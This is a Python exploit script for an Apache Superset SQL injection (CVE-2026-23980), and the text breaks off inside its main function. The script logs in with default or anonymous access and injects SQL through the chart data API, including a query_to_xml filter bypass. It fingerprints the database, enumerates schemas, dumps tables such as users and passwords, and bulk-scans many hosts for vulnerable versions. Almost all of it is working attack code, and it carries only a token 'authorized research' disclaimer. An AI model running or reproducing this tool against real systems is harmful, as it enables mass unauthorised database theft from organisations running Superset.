#!/usr/bin/env python3 """ CVE-2026-23980 -- Apache Superset Authenticated Error-Based SQL Injection ========================================================================= Apache Superset < 6.0.0 allows authenticated users with read access to perform error-based SQL injection via the 'sqlExpression' or 'where' parameters in the /api/v1/chart/data endpoint. Kill chain: POST /api/v1/chart/data -> ChartDataRestApi.data() -> QueryContext.get_df_payload() -> SqlaTable.get_sqla_query() -> adhoc column sqlExpression -> validate_adhoc_subquery() BYPASSED via query_to_xml() -> raw SQL hits the database -> data extraction For AUTHORIZED SECURITY RESEARCH ONLY. CVSS 6.5 | CWE-89 | Fixed in Apache Superset 6.0.0 """ from __future__ import annotations import argparse import json import sys import textwrap import time import random import re import threading from concurrent.futures import ThreadPoolExecutor, as_completed try: import requests from requests.exceptions import ConnectionError, Timeout except ImportError: print("[!] 'requests' library required: pip install requests") sys.exit(1) # -- Globals ----------------------------------------------------------------- VERBOSITY = 1 # -- ANSI -------------------------------------------------------------------- class C: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" CYAN = "\033[96m" MAGENTA = "\033[95m" WHITE = "\033[97m" GRAY = "\033[90m" BOLD = "\033[1m" DIM = "\033[2m" BLINK = "\033[5m" RESET = "\033[0m" # -- Output helpers ---------------------------------------------------------- _glitch_chars = list("\u2591\u2592\u2593\u2588\u2580\u2584\u258c\u2590") _print_lock = threading.Lock() def _glitch(n: int = 12) -> str: return "".join(random.choice(_glitch_chars) for _ in range(n)) def _typewriter(text: str, speed: float = 0.02): for ch in text: sys.stdout.write(ch) sys.stdout.flush() time.sleep(speed) print() def info(msg): if VERBOSITY >= 1: print(f" {C.CYAN}[*]{C.RESET} {msg}") def good(msg): print(f" {C.GREEN}[+]{C.RESET} {msg}") def warn(msg): print(f" {C.YELLOW}[!]{C.RESET} {msg}") def fail(msg): print(f" {C.RED}{C.BOLD}[-]{C.RESET} {msg}") def creepy(msg): if VERBOSITY >= 1: print(f" {C.MAGENTA}[~]{C.RESET} {C.MAGENTA}{msg}{C.RESET}") def debug(msg): if VERBOSITY >= 2: print(f" {C.GRAY}[DEBUG]{C.RESET} {C.DIM}{msg}{C.RESET}") def print_table(headers: list[str], rows: list[list[str]], title: str = ""): """Print a sqlmap-style ASCII table.""" if not rows: return col_widths = [len(h) for h in headers] for row in rows: for i, cell in enumerate(row): if i < len(col_widths): col_widths[i] = max(col_widths[i], len(str(cell))) sep = "+-" + "-+-".join("-" * w for w in col_widths) + "-+" hdr = "| " + " | ".join(h.ljust(w) for h, w in zip(headers, col_widths)) + " |" if title: print(f"\n {C.WHITE}{C.BOLD}{title}{C.RESET}") print(f" {sep}") print(f" {C.BOLD}{hdr}{C.RESET}") print(f" {sep}") for row in rows: cells = [] for i, w in enumerate(col_widths): val = str(row[i]) if i < len(row) else "" cells.append(val.ljust(w)) print(f" | {' | '.join(cells)} |") print(f" {sep}") print(f" {C.DIM}[{len(rows)} row(s)]{C.RESET}") # -- Session management ------------------------------------------------------ def login(base_url: str, username: str, password: str, timeout: int = 15) -> requests.Session | None: session = requests.Session() try: r = session.post( f"{base_url}/api/v1/security/login", json={"username": username, "password": password, "provider": "db", "refresh": True}, timeout=timeout, ) if r.status_code != 200: fail(f"login failed: HTTP {r.status_code}") return None token = r.json().get("access_token") if not token: fail("no access_token in response") return None session.headers.update({"Authorization": f"Bearer {token}"}) except Exception as e: fail(f"login error: {e}") return None try: r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout) if r.status_code == 200: csrf = r.json().get("result") if csrf: session.headers.update({"X-CSRFToken": csrf}) except Exception: pass return session def try_anonymous(base_url: str, timeout: int = 15) -> requests.Session | None: """Try to access Superset without authentication. Works when PUBLIC_ROLE_LIKE is set (e.g. "Gamma"), giving anonymous users read access to datasets and the chart/data endpoint. Also tries to grab a CSRF token from the login page cookies, which some Superset configs expose to anonymous users. """ session = requests.Session() # Step 1: Hit the main page to pick up any session cookies try: r = session.get(base_url, timeout=timeout) except Exception: pass # Step 2: Try to get a CSRF token (some configs expose this anonymously) try: r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout) if r.status_code == 200: csrf = r.json().get("result") if csrf: session.headers.update({"X-CSRFToken": csrf}) debug(f"got anonymous CSRF token") except Exception: pass # Step 3: Test if we can actually hit the chart/data endpoint # Try a minimal request to see if we get 401/403 or something else test_body = { "datasource": {"id": 1, "type": "table"}, "queries": [{ "columns": [{"label": "test", "sqlExpression": "1", "expressionType": "SQL"}], "metrics": [], "filters": [], "extras": {"having": "", "where": ""}, "row_limit": 1, "time_range": "No filter", }], "result_format": "json", "result_type": "full", } try: r = session.post(f"{base_url}/api/v1/chart/data", json=test_body, timeout=timeout) if r.status_code in (200, 400, 422, 500): # Got past auth — public role is active return session elif r.status_code in (401, 403): return None except Exception: pass return None def check_version(base_url: str, timeout: int = 10) -> str | None: for endpoint in ["/api/v1/version", "/health"]: try: r = requests.get(f"{base_url}{endpoint}", timeout=timeout) if r.status_code == 200: data = r.json() v = data.get("result", {}).get("version") or data.get("version") if v: return v except Exception: pass return None def is_vulnerable(version: str) -> bool: try: parts = [int(x) for x in version.strip().split(".")[:3]] return parts[0] < 6 except ValueError: return False def enumerate_datasources(base_url: str, session: requests.Session, timeout: int = 15) -> list[dict]: datasources = [] try: r = session.get(f"{base_url}/api/v1/dataset/", params={"q": "(page_size:50)"}, timeout=timeout) if r.status_code == 200: for ds in r.json().get("result", []): datasources.append({ "id": ds.get("id"), "name": ds.get("table_name") or ds.get("datasource_name"), "schema": ds.get("schema"), "database": ds.get("database", {}).get("database_name", "?"), "type": ds.get("datasource_type", "table"), }) except Exception: pass return datasources # -- SQL Injection core ------------------------------------------------------- def build_chart_data_payload(datasource_id: int, datasource_type: str = "table", injection_point: str = "sqlExpression", sqli_payload: str = "1") -> dict: if injection_point == "sqlExpression": return { "datasource": {"id": datasource_id, "type": datasource_type}, "queries": [{ "columns": [{ "label": "injected", "sqlExpression": sqli_payload, "expressionType": "SQL", }], "metrics": [], "filters": [], "extras": {"having": "", "where": ""}, "row_limit": 1000, "order_desc": True, "time_range": "No filter", }], "result_format": "json", "result_type": "full", } else: return { "datasource": {"id": datasource_id, "type": datasource_type}, "queries": [{ "columns": [], "metrics": [{"label": "cnt", "expressionType": "SQL", "sqlExpression": "COUNT(*)"}], "filters": [], "extras": {"having": "", "where": sqli_payload}, "row_limit": 1, "order_desc": True, "time_range": "No filter", }], "result_format": "json", "result_type": "full", } def send_sqli(base_url: str, session: requests.Session, datasource_id: int, sqli_payload: str, injection_point: str = "sqlExpression", datasource_type: str = "table", timeout: int = 30) -> tuple[int, str]: body = build_chart_data_payload(datasource_id, datasource_type, injection_point, sqli_payload) debug(f"SQL payload: {sqli_payload}") try: r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout) if VERBOSITY >= 3: debug(f"HTTP {r.status_code}: {r.text[:300]}") return r.status_code, r.text except Exception as e: return 0, str(e) def extract_from_direct(response_text: str) -> list[dict] | None: """Parse all rows from a successful JSON response.""" try: data = json.loads(response_text) results = data.get("result", []) if results and results[0].get("data"): return results[0]["data"] except Exception: pass return None def extract_single_from_direct(response_text: str) -> str | None: """Extract a single value from direct response.""" rows = extract_from_direct(response_text) if rows: row = rows[0] val = row.get("injected") if val is not None: return str(val) return None def extract_from_error(response_text: str) -> str | None: patterns = [ r'invalid input syntax for (?:type )?integer: "([^"]*)"', r'"message":\s*".*?invalid input syntax.*?\\"([^\\]*)\\"', ] for pat in patterns: m = re.search(pat, response_text) if m: return m.group(1) return None def sqli_extract_string(sql_expr: str) -> str: return f"CAST(({sql_expr}) AS INT)" def sqli_xml_bypass(sql_query: str) -> str: return f"query_to_xml('{sql_query}', true, false, '')" def extract_value(base_url, session, ds_id, sql, inj_point="sqlExpression", xml_bypass=False, timeout=30) -> str | None: """Extract a single value. Tries direct, then error-based.""" # Direct if inj_point == "sqlExpression": status, text = send_sqli(base_url, session, ds_id, f"({sql})", injection_point=inj_point, timeout=timeout) result = extract_single_from_direct(text) if result: return result # Error-based if xml_bypass: inner = sqli_xml_bypass(sql.replace("'", "''")) payload = f"CAST(({inner})::text AS INT)" else: payload = sqli_extract_string(sql) if inj_point == "where": payload = f"1=1 AND {payload} > 0" status, text = send_sqli(base_url, session, ds_id, payload, injection_point=inj_point, timeout=timeout) return extract_from_error(text) def extract_rows(base_url, session, ds_id, sql, inj_point="sqlExpression", xml_bypass=False, timeout=30, start=0, stop=100) -> list[str]: """Extract multiple rows using LIMIT/OFFSET.""" results = [] base_sql = re.sub(r'\s+LIMIT\s+\d+', '', sql, flags=re.I) base_sql = re.sub(r'\s+OFFSET\s+\d+', '', base_sql, flags=re.I) for offset in range(start, stop): query = f"{base_sql} LIMIT 1 OFFSET {offset}" val = extract_value(base_url, session, ds_id, query, inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if val is None: break results.append(val) if VERBOSITY >= 1: sys.stdout.write(f"\r {C.CYAN}[*]{C.RESET} extracting... " f"{C.BOLD}{len(results)}{C.RESET} row(s)") sys.stdout.flush() if results and VERBOSITY >= 1: print() return results def extract_multi_column_direct(base_url, session, ds_id, columns: list[str], inj_point="sqlExpression", timeout=30, start=0, stop=20) -> list[list[str]]: """Extract multi-column data using direct sqlExpression reads. Instead of SELECT col FROM table (blocked by subquery filter), we inject the column name directly as the sqlExpression. This reads from the datasource's underlying table without a FROM clause. We use row_limit and offset via multiple requests. """ # Build payload with all columns at once body = { "datasource": {"id": ds_id, "type": "table"}, "queries": [{ "columns": [ {"label": col, "sqlExpression": col, "expressionType": "SQL"} for col in columns ], "metrics": [], "filters": [], "extras": {"having": "", "where": ""}, "row_limit": stop - start, "row_offset": start, "order_desc": False, "time_range": "No filter", }], "result_format": "json", "result_type": "full", } try: r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout) if r.status_code == 200: data = r.json().get("result", [{}])[0].get("data", []) rows = [] for row in data: rows.append([str(row.get(col, "NULL")) for col in columns]) return rows except Exception: pass return [] def extract_multi_column_rows(base_url, session, ds_id, columns: list[str], table: str, inj_point="sqlExpression", xml_bypass=False, timeout=30, start=0, stop=20, where="") -> list[list[str]]: """Extract multiple columns per row. Tries direct read first, then subquery.""" # Strategy 1: Direct column read (works when ds_id matches the table) if inj_point == "sqlExpression" and not xml_bypass: rows = extract_multi_column_direct(base_url, session, ds_id, columns, inj_point=inj_point, timeout=timeout, start=start, stop=stop) if rows: if VERBOSITY >= 1: print(f" {C.CYAN}[*]{C.RESET} extracted {C.BOLD}{len(rows)}{C.RESET} row(s) via direct read") return rows # Strategy 2: Subquery per column (works with xml_bypass on PostgreSQL) rows = [] where_clause = f" WHERE {where}" if where else "" for offset in range(start, stop): row_data = [] empty = True for col in columns: sql = f"SELECT {col} FROM {table}{where_clause} LIMIT 1 OFFSET {offset}" val = extract_value(base_url, session, ds_id, sql, inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if val is not None: empty = False row_data.append(val or "NULL") if empty: break rows.append(row_data) if VERBOSITY >= 1: sys.stdout.write(f"\r {C.CYAN}[*]{C.RESET} dumping... " f"{C.BOLD}{len(rows)}{C.RESET} row(s)") sys.stdout.flush() if rows and VERBOSITY >= 1: print() return rows # -- DB Fingerprinting ------------------------------------------------------- def fingerprint_db(base_url, session, ds_id, inj_point="sqlExpression", timeout=30) -> str: """Detect backend database type. Returns 'sqlite', 'postgresql', or 'unknown'.""" info("fingerprinting backend database...") # Try SQLite — sqlite_version() is a scalar function (no FROM) status, text = send_sqli(base_url, session, ds_id, "(SELECT sqlite_version())", injection_point=inj_point, timeout=timeout) val = extract_single_from_direct(text) if val and re.match(r'\d+\.\d+', val): good(f"backend: {C.BOLD}SQLite {val}{C.RESET}") return "sqlite" # Try PostgreSQL — current_setting() is a scalar function (no FROM) status, text = send_sqli(base_url, session, ds_id, "(SELECT current_setting('server_version'))", injection_point=inj_point, timeout=timeout) val = extract_single_from_direct(text) if val and re.match(r'\d+\.\d+', val): good(f"backend: {C.BOLD}PostgreSQL {val}{C.RESET}") return "postgresql" # Try MySQL — @@version is a system variable (no FROM) status, text = send_sqli(base_url, session, ds_id, "(SELECT @@version)", injection_point=inj_point, timeout=timeout) val = extract_single_from_direct(text) if val: good(f"backend: {C.BOLD}MySQL {val}{C.RESET}") return "mysql" warn("could not fingerprint backend database") return "unknown" # -- Enumeration functions (sqlmap-style) ------------------------------------ def enum_banner(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout): info("fetching banner...") queries = { "sqlite": "SELECT sqlite_version()", "postgresql": "SELECT current_setting('server_version')", "mysql": "SELECT @@version", "unknown": "SELECT sqlite_version()", } val = extract_value(base_url, session, ds_id, queries.get(db_type, queries["unknown"]), inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if val: good(f"banner: {C.BOLD}{val}{C.RESET}") else: fail("could not fetch banner") def enum_current_user(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout): info("fetching current user...") queries = { "sqlite": "SELECT 'sqlite_user'", "postgresql": "SELECT current_user", "mysql": "SELECT user()", } val = extract_value(base_url, session, ds_id, queries.get(db_type, "SELECT current_user"), inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if val: good(f"current user: {C.BOLD}{val}{C.RESET}") else: fail("could not fetch current user") def enum_current_db(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout): info("fetching current database...") queries = { "sqlite": "SELECT 'main'", "postgresql": "SELECT current_database()", "mysql": "SELECT database()", } val = extract_value(base_url, session, ds_id, queries.get(db_type, "SELECT current_database()"), inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if val: good(f"current database: {C.BOLD}{val}{C.RESET}") else: fail("could not fetch current database") def enum_hostname(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout): info("fetching hostname...") queries = { "sqlite": "SELECT 'N/A (SQLite)'", "postgresql": "SELECT inet_server_addr()", "mysql": "SELECT @@hostname", } val = extract_value(base_url, session, ds_id, queries.get(db_type, "SELECT 'unknown'"), inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if val: good(f"hostname: {C.BOLD}{val}{C.RESET}") else: fail("could not fetch hostname") def enum_dbs(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout): info("enumerating databases...") queries = { "sqlite": "SELECT name FROM pragma_database_list", "postgresql": "SELECT datname FROM pg_database WHERE datistemplate = false", "mysql": "SELECT schema_name FROM information_schema.schemata", } sql = queries.get(db_type, queries["postgresql"]) rows = extract_rows(base_url, session, ds_id, sql, inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if rows: good(f"available databases [{len(rows)}]:") print_table(["database"], [[r] for r in rows]) else: # Fallback: list databases from Superset API warn("subquery blocked -- listing databases from Superset API") try: r = session.get(f"{base_url.rstrip('/')}/api/v1/database/", timeout=timeout) if r.status_code == 200: dbs = r.json().get("result", []) if dbs: db_names = [d.get("database_name", "?") for d in dbs] good(f"available databases [{len(db_names)}] (via API):") print_table(["database"], [[n] for n in db_names]) return except Exception: pass fail("could not enumerate databases") def enum_tables(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_db=None, datasources=None): db_label = target_db or "current" info(f"enumerating tables in '{db_label}'...") if db_type == "sqlite": sql = "SELECT name FROM sqlite_master WHERE type='table'" elif db_type == "postgresql": schema = target_db or "public" sql = (f"SELECT table_name FROM information_schema.tables " f"WHERE table_schema='{schema}'") elif db_type == "mysql": if target_db: sql = (f"SELECT table_name FROM information_schema.tables " f"WHERE table_schema='{target_db}'") else: sql = ("SELECT table_name FROM information_schema.tables " "WHERE table_schema=database()") else: sql = "SELECT name FROM sqlite_master WHERE type='table'" rows = extract_rows(base_url, session, ds_id, sql, inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if rows: good(f"tables in '{db_label}' [{len(rows)}]:") print_table(["table_name"], [[r] for r in rows]) else: # Fallback: if subquery blocked, list known datasources as tables if datasources: warn("subquery filter blocked FROM clause -- listing known datasources instead") warn("use --xml-bypass on PostgreSQL to bypass this filter") rows = [ds["name"] for ds in datasources if ds["name"]] if rows: good(f"known datasource tables [{len(rows)}]:") print_table(["table_name"], [[r] for r in rows]) else: fail("could not enumerate tables (subquery filter active)") warn("try --xml-bypass on PostgreSQL targets") return rows def enum_columns_via_api(base_url, session, target_table, datasources, timeout=15): """Fallback: get columns from the Superset dataset API.""" # Find the dataset ID for this table ds_match = None for ds in (datasources or []): if ds.get("name") == target_table: ds_match = ds break if not ds_match: return [] try: r = session.get(f"{base_url}/api/v1/dataset/{ds_match['id']}", timeout=timeout) if r.status_code == 200: cols = r.json().get("result", {}).get("columns", []) return [c.get("column_name") or c.get("name", "?") for c in cols] except Exception: pass return [] def enum_columns(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_table, target_db=None, datasources=None): info(f"enumerating columns in '{target_table}'...") if db_type == "sqlite": sql = f"SELECT name FROM pragma_table_info('{target_table}')" elif db_type == "postgresql": schema = target_db or "public" sql = (f"SELECT column_name FROM information_schema.columns " f"WHERE table_schema='{schema}' AND table_name='{target_table}'") elif db_type == "mysql": if target_db: sql = (f"SELECT column_name FROM information_schema.columns " f"WHERE table_schema='{target_db}' AND table_name='{target_table}'") else: sql = (f"SELECT column_name FROM information_schema.columns " f"WHERE table_schema=database() AND table_name='{target_table}'") else: sql = f"SELECT name FROM pragma_table_info('{target_table}')" rows = extract_rows(base_url, session, ds_id, sql, inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout) if rows: good(f"columns in '{target_table}' [{len(rows)}]:") print_table(["column_name"], [[r] for r in rows]) else: # Fallback: get columns from Superset API warn("subquery blocked -- falling back to Superset dataset API") api_cols = enum_columns_via_api(base_url, session, target_table, datasources, timeout) if api_cols: rows = api_cols good(f"columns in '{target_table}' [{len(rows)}] (via API):") print_table(["column_name"], [[r] for r in rows]) else: fail(f"could not enumerate columns for '{target_table}'") return rows def enum_count(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_table, target_db=None): info(f"counting rows in '{target_table}'...") # COUNT(*) must be sent as a metric, not a column body = { "datasource": {"id": ds_id, "type": "table"}, "queries": [{ "columns": [], "metrics": [{"label": "cnt", "expressionType": "SQL", "sqlExpression": "COUNT(*)"}], "filters": [], "extras": {"having": "", "where": ""}, "row_limit": 1, "time_range": "No filter", }], "result_format": "json", "result_type": "full", } try: r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout) if r.status_code == 200: data = r.json().get("result", [{}])[0].get("data", []) if data: cnt = data[0].get("cnt") if cnt is not None: good(f"rows in '{target_table}': {C.BOLD}{cnt}{C.RESET}") return except Exception: pass fail("could not count rows") def enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_table, target_columns=None, target_db=None, start=0, stop=20, datasources=None): if target_columns: columns = [c.strip() for c in target_columns.split(",")] else: # Auto-discover columns cols = enum_columns(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_table, target_db, datasources=datasources) if not cols: fail("cannot dump without column names -- specify -C manually") return columns = cols[:10] info(f"dumping '{target_table}' [{', '.join(columns)}] rows {start}-{stop}...") rows = extract_multi_column_rows( base_url, session, ds_id, columns, target_table, inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout, start=start, stop=stop, ) if rows: good(f"dumped {len(rows)} row(s) from '{target_table}':") print_table(columns, rows, title=f"Table: {target_table}") else: fail(f"could not dump '{target_table}'") def enum_dump_all(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_db=None, start=0, stop=10, datasources=None): tables = enum_tables(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, target_db, datasources=datasources) if not tables: return for table_name in tables: print() enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout, table_name, target_db=target_db, start=start, stop=stop, datasources=datasources) # -- Injection test ---------------------------------------------------------- def test_injectable(base_url, session, ds_id, timeout=30) -> str | None: for point in ("sqlExpression", "where"): if point == "sqlExpression": payload = "CAST('sqli_test_xyzzy' AS INT)" else: payload = "1=1 AND CAST('sqli_test_xyzzy' AS INT) > 0" status, text = send_sqli(base_url, session, ds_id, payload, injection_point=point, timeout=timeout) if "sqli_test_xyzzy" in text: return point return None # -- Bulk scanner ------------------------------------------------------------ def _scan_single(target, timeout, results): target = target.strip().rstrip("/") if not target: return if not target.startswith("http"): target = f"http://{target}" entry = {"url": target, "status": "unknown", "version": None} try: version = check_version(target, timeout=timeout) if version: entry["version"] = version entry["status"] = "VULNERABLE" if is_vulnerable(version) else "patched" else: try: r = requests.get(target, timeout=timeout) entry["status"] = "up (version hidden)" if r.status_code < 500 else "error" except Exception: entry["status"] = "down" with _print_lock: if entry["status"] == "VULNERABLE": print(f" {C.RED}[VULN]{C.RESET} {C.BOLD}{target}{C.RESET} -- {entry['version']}") elif entry["status"] == "patched": print(f" {C.GREEN}[SAFE]{C.RESET} {target} -- {entry['version']}") else: print(f" {C.GRAY}[----]{C.RESET} {target} -- {C.DIM}{entry['status']}{C.RESET}") except Exception: entry["status"] = "error" results[target] = entry def run_bulk_scan(scan_file, threads=10, timeout=10, output_file=None): try: with open(scan_file) as f: targets = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")] except FileNotFoundError: fail(f"file not found: {scan_file}") sys.exit(1) print(f"\n {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- {C.DIM}Bulk Scanner{C.RESET}") info(f"loaded {len(targets)} target(s)") print(f" {C.DIM}{'=' * 50}{C.RESET}") results = {} start = time.time() with ThreadPoolExecutor(max_workers=threads) as pool: futures = {pool.submit(_scan_single, t, timeout, results): t for t in targets} for f in as_completed(futures): try: f.result() except Exception: pass elapsed = time.time() - start vuln = sum(1 for r in results.values() if r["status"] == "VULNERABLE") print(f" {C.DIM}{'=' * 50}{C.RESET}") print(f" {C.RED}{C.BOLD}{vuln}{C.RESET} vulnerable / {len(results)} scanned ({elapsed:.1f}s)\n") if output_file: with open(output_file, "w") as f: for r in results.values(): f.write(f"{r['status']}\t{r['url']}\tv={r['version'] or '?'}\n") good(f"saved to {output_file}") # -- Banner ------------------------------------------------------------------ _BLOODY_SKULL = [ " \033[91m\033[1m_,.-------.,_\033[0m", " \033[91m\033[1m,;~'\033[0m\033[31m \033[91m\033[1m'~;,\033[0m", " \033[91m\033[1m,;\033[0m\033[31m \033[91m\033[1m;,\033[0m", " \033[91m\033[1m;\033[0m\033[31m \033[91m\033[1m_ ___ _\033[0m\033[31m \033[91m\033[1m;\033[0m", " \033[91m\033[1m'\033[0m\033[31m \033[97m\033[1m/ \\ \033[0m\033[31m \033[97m\033[1m/ \\ \033[0m\033[31m \033[91m\033[1m'\033[0m", " \033[91m\033[1m;\033[0m\033[31m \033[97m\033[1m| () |\033[0m\033[31m \033[97m\033[1m| () |\033[0m\033[31m \033[91m\033[1m;\033[0m", " \033[91m\033[1m;\033[0m\033[31m \033[97m\033[1m\\__/ \033[0m\033[31m \033[97m\033[1m\\__/ \033[0m\033[31m \033[91m\033[1m;\033[0m", " \033[91m\033[1m;\033[0m\033[31m \033[91m\033[1m/\\\033[0m\033[31m \033[91m\033[1m;\033[0m", " \033[91m\033[1m;\033[0m\033[31m \033[91m\033[1m\\______/\033[0m\033[31m \033[91m\033[1m;\033[0m", " \033[91m\033[1m';\033[0m\033[31m \033[91m\033[1m|\"\"\"\"\"\"|\033[0m\033[31m \033[91m\033[1m;'\033[0m", " \033[91m\033[1m';\033[0m\033[31m \033[91m\033[1m| |\033[0m\033[31m \033[91m\033[1m;'\033[0m", " \033[91m\033[1m'------'\033[0m", ] def banner(): print() for line in _BLOODY_SKULL: print(f" {line}") time.sleep(0.04) print(f"""{C.RED}{C.BOLD} \u2554{'=' * 59}\u2557 \u2551 {C.BLINK}CVE-2026-23980{C.RESET}{C.RED}{C.BOLD} -- Apache Superset SQLi \u2551 \u2551 {C.RESET}{C.DIM}CVSS 6.5 | CWE-89 | Superset < 6.0.0{C.RESET}{C.RED}{C.BOLD} \u2551 \u255a{'=' * 59}\u255d{C.RESET}""") _typewriter( f" {C.GRAY}// their queries bleed data. " f"sqlExpression was the wound.{C.RESET}", speed=0.015, ) print() # -- Main -------------------------------------------------------------------- def main(): global VERBOSITY desc = f""" {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- Apache Superset Authenticated SQL Injection {C.DIM}sqlmap-style enumeration via sqlExpression / where injection{C.RESET} {C.GRAY}CVSS 6.5 | CWE-89 | Apache Superset < 6.0.0{C.RESET} {C.WHITE}{C.BOLD}KILL CHAIN:{C.RESET} {C.DIM}POST /api/v1/chart/data -> sqlExpression -> exec() on DB{C.RESET} """ epilog = f""" {C.WHITE}{C.BOLD}EXAMPLES:{C.RESET} {C.CYAN}Recon:{C.RESET} %(prog)s -u http://target:8088 --check {C.CYAN}Enumerate:{C.RESET} %(prog)s -u http://target:8088 --banner --current-user --current-db %(prog)s -u http://target:8088 --dbs %(prog)s -u http://target:8088 --tables %(prog)s -u http://target:8088 --tables -D public %(prog)s -u http://target:8088 --columns -T users %(prog)s -u http://target:8088 --count -T users {C.CYAN}Dump:{C.RESET} %(prog)s -u http://target:8088 --dump -T users %(prog)s -u http://target:8088 --dump -T users -C "username,password" --start 0 --stop 50 %(prog)s -u http://target:8088 --dump-all --stop 5 {C.CYAN}Raw SQL:{C.RESET} %(prog)s -u http://target:8088 --sql "SELECT version()" {C.CYAN}No creds:{C.RESET} %(prog)s -u http://target:8088 --anonymous --banner --tables {C.CYAN}Bypass + Bulk:{C.RESET} %(prog)s -u http://target:8088 --tables --xml-bypass %(prog)s --scan-file targets.txt --threads 20 {C.DIM}// authorized security research only.{C.RESET} """ P = argparse.ArgumentParser(description=desc, epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) g = P.add_argument_group(f"{C.RED}TARGET{C.RESET}", f"{C.DIM}who forgot to parameterize today?{C.RESET}") g.add_argument("-u", "--url", help="Superset URL (http://target:8088)") g.add_argument("--user", default="admin", help="username (default: admin)") g.add_argument("--password", default="admin", help="password (default: admin)") g.add_argument("--anonymous", action="store_true", help="skip login -- exploit via PUBLIC_ROLE (no creds needed)") g.add_argument("--ds-id", type=int, help="datasource/dataset ID") g = P.add_argument_group(f"{C.RED}ENUMERATE{C.RESET}", f"{C.DIM}sqlmap-style automated extraction{C.RESET}") g.add_argument("--banner", action="store_true", help="DB version banner") g.add_argument("--current-user", action="store_true", help="current DB user") g.add_argument("--current-db", action="store_true", help="current database") g.add_argument("--hostname", action="store_true", help="server hostname") g.add_argument("--dbs", action="store_true", help="list databases") g.add_argument("--tables", action="store_true", help="list tables") g.add_argument("--columns", action="store_true", help="list columns (requires -T)") g.add_argument("--dump", action="store_true", help="dump table (requires -T)") g.add_argument("--dump-all", action="store_true", help="dump all tables") g.add_argument("--count", action="store_true", help="count table rows (requires -T)") g = P.add_argument_group(f"{C.RED}SPECIFY{C.RESET}", f"{C.DIM}narrow down the target{C.RESET}") g.add_argument("-D", dest="target_db", help="target database/schema") g.add_argument("-T", dest="target_table", help="target table") g.add_argument("-C", dest="target_columns", help="target columns (comma-sep)") g.add_argument("--start", type=int, default=0, help="start row (default: 0)") g.add_argument("--stop", type=int, default=20, help="stop row (default: 20)") g = P.add_argument_group(f"{C.RED}INJECTION{C.RESET}", f"{C.DIM}manual control over the injection{C.RESET}") g.add_argument("--check", action="store_true", help="recon only") g.add_argument("--test", action="store_true", help="test if injectable") g.add_argument("--sql", help="raw SQL query to extract") g.add_argument("--injection-point", choices=["sqlExpression", "where"], default="sqlExpression", help="injection vector (default: sqlExpression)") g.add_argument("--xml-bypass", action="store_true", help="bypass subquery filter via query_to_xml()") g = P.add_argument_group(f"{C.RED}SCAN{C.RESET}") g.add_argument("--scan-file", help="bulk scan targets (one URL/line)") g.add_argument("--threads", type=int, default=10, help="scan threads (default: 10)") g.add_argument("--scan-output", help="save scan results") g = P.add_argument_group(f"{C.RED}GENERAL{C.RESET}") g.add_argument("-v", type=int, default=1, help="verbosity 0-3 (default: 1)") g.add_argument("--proxy", help="HTTP proxy (http://127.0.0.1:8080)") g.add_argument("--timeout", type=int, default=30, help="timeout (default: 30)") g.add_argument("--batch", action="store_true", help="non-interactive mode") args = P.parse_args() VERBOSITY = args.v # Bulk scan if args.scan_file: run_bulk_scan(args.scan_file, args.threads, args.timeout, args.scan_output) sys.exit(0) if not args.url: fail("--url / -u required (or --scan-file for bulk)") P.print_usage() sys.exit(1) base_url = args.url.rstrip("/") if args.proxy: import os os.environ["HTTP_PROXY"] = args.proxy os.environ["HTTPS_PROXY"] = args.proxy banner() # -- Recon ---------------------------------------------------------------- info("probing target...") version = check_version(base_url, timeout=args.timeout) if version: if is_vulnerable(version): good(f"Superset {C.BOLD}{version}{C.RESET} -- {C.RED}{C.BOLD}VULNERABLE{C.RESET}") else: warn(f"Superset {version} -- likely patched") else: warn("version unknown") # -- Auth ----------------------------------------------------------------- session = None if args.anonymous: info("trying anonymous access (PUBLIC_ROLE)...") session = try_anonymous(base_url, timeout=args.timeout) if session: good(f"anonymous access {C.BOLD}WORKS{C.RESET} -- PUBLIC_ROLE is active") creepy("no credentials needed. they left the door open.") else: fail("anonymous access denied -- PUBLIC_ROLE not configured") warn("falling back to credential-based login...") if not session: info(f"authenticating as '{args.user}'...") session = login(base_url, args.user, args.password, timeout=args.timeout) if not session: fail("all authentication methods failed") sys.exit(1) good("authenticated") # -- Datasources ---------------------------------------------------------- info("enumerating datasources...") datasources = enumerate_datasources(base_url, session, timeout=args.timeout) if datasources: good(f"{len(datasources)} datasource(s):") for ds in datasources: print(f" {C.CYAN}{ds['id']}{C.RESET} {ds['name']} " f"{C.DIM}[{ds['database']}]{C.RESET}") else: warn("no datasources found") if args.check: print(f"\n {C.GRAY}// recon 